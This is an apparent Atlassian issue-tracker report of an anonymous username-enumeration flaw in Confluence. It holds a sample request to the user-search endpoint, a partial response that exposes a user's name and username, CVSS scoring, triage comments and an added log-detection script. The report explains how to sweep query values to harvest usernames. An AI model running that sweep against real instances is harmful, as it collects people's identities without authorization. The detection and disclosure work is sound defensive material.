CONFSERVER-25322 (Confluence Data Center)

The vulnerability exists in the standalone and also in the online demonstration environment.

It is possible to anonymously enumerate all usernames via the script at /rest/prototype/1/search/user.json?max-results=10&query=XX. The 'query' GET parameter should contain at least two characters. It is possible to enumerate all usernames by performing a search from 'query' value 'aa' to 'zz'.


When the following GET request is made:

    GET /rest/prototype/1/search/user.json?max-results=10&query=si HTTP/1.1
    Host: confluence.atlassian.com

The following answer is given:

    HTTP/1.1 200 OK
    Date: Tue, 24 Apr 2012 13:32:11 GMT
    Cache-Control: no-cache, must-revalidate
    Expires: Thu, 01 Jan 1970 00:00:00 GMT
    Content-Type: application/json
    Keep-Alive: timeout=3, max=20
    Connection: Keep-Alive
    Content-Length: 11707

    {"totalSize":846,"result":[{"id":"254738536","type":"user","title":"Harshil Singhal","wikiLink":"[~hs39867]","createdDate":{"friendly":"Aug 22, 2011","date":"2011-08-22T21:52:45-0500"},"creator":{"links":[{"href":"https://confluence.atlassian.com/rest/prototype/1/user/system/anonymous","rel":"self"}],"avatarUrl":"/s/en_GB/3277/16/_/images/icons/profilepics/anonymous.png","anonymous":true,"displayName":"Anonymous"},"lastModifier":{"links":[{"href":"https://confluence.atlassian.com/rest/prototype/1/user/system/anonymous","rel":"self"}],"avatarUrl":"/s/en_GB/3277/16/_/images/icons/profilepics/anonymous.png","anonymous":true,"displayName":"Anonymous"},"username":"hs39867","thumbnailLink":
    [..]
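As an added illustration (not part of the report or of Atlassian's code): a small detection script that scans access-log lines for unauthenticated clients sweeping the user-search endpoint named above with many distinct query values and receiving 200 responses, which is the exposed condition described in this issue. The log lines, addresses and threshold are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Combined Log Format), hypothetical
# addresses; only the endpoint path comes from the report.
SAMPLE_LOG = """\
203.0.113.7 - - [24/Apr/2012:13:32:10 +0000] "GET /rest/prototype/1/search/user.json?max-results=10&query=aa HTTP/1.1" 200 11707
203.0.113.7 - - [24/Apr/2012:13:32:11 +0000] "GET /rest/prototype/1/search/user.json?max-results=10&query=ab HTTP/1.1" 200 9012
203.0.113.7 - - [24/Apr/2012:13:32:11 +0000] "GET /rest/prototype/1/search/user.json?max-results=10&query=ac HTTP/1.1" 200 402
203.0.113.7 - - [24/Apr/2012:13:32:12 +0000] "GET /rest/prototype/1/search/user.json?max-results=10&query=ad HTTP/1.1" 200 1200
198.51.100.4 - jdoe [24/Apr/2012:13:40:02 +0000] "GET /rest/prototype/1/search/user.json?max-results=10&query=si HTTP/1.1" 200 11707
198.51.100.9 - - [24/Apr/2012:13:41:00 +0000] "GET /display/DOC/Home HTTP/1.1" 200 5120
"""

# ip, ident, authuser ("-" means unauthenticated), [timestamp], "request", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
USER_SEARCH_PATH = "/rest/prototype/1/search/user.json"


def parse_line(line):
    """Parse one log line into a dict with path, query value and int status."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    url = urlsplit(rec["target"])
    rec["path"] = url.path
    rec["query"] = parse_qs(url.query).get("query", [""])[0]
    rec["status"] = int(rec["status"])
    return rec


def find_enumeration(log_text, threshold=3):
    """Return {ip: sorted distinct query values} for unauthenticated clients that
    hit the user-search endpoint with at least `threshold` distinct queries and
    got 200 back. A correctly locked-down instance answers 401 instead."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec or rec["path"] != USER_SEARCH_PATH:
            continue
        if rec["user"] != "-" or rec["status"] != 200:
            continue
        seen[rec["ip"]].add(rec["query"])
    return {ip: sorted(q) for ip, q in seen.items() if len(q) >= threshold}
```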


Chii (Inactive) added a comment:

fixing as part of CONF-25350

Sijmen Ruwhof added a comment:

Hi David,

Thank you for taking this vulnerability seriously.

Regards,

Sijmen

David Black added a comment (edited):

CVSS score: 4.3 => Medium severity

Exploitability Metrics

    AccessVector: Network
    AccessComplexity: Medium
    Authentication: None

Impact Metrics

    ConfImpact: Partial
    IntegImpact: None
    AvailImpact: None

See https://extranet.atlassian.com/display/SECCOUNCIL/How+to+evaluate+vulnerability+severity+under+CVSS for details and http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2 for score calculator.

David Black added a comment (edited):

Hi, sruwhof, on a fresh stand-alone Confluence 4.2.1 out of the box I cannot anonymously enumerate usernames using the method you have reported here.
Instead the API returns the following:

    <?xml version="1.0" encoding="UTF-8" standalone="yes"?><status><status-code>401</status-code><message>Client must be authenticated to access this resource.</message></status>

After enabling 'Anonymous Access' (via the Global Permissions configuration page) it is possible to anonymously enumerate usernames using the method you have reported here. This occurs even with the 'USE' 'View User Profiles' global permission not being granted to anonymous users.

David Black added a comment:

Thank you for reporting this bug to Atlassian.
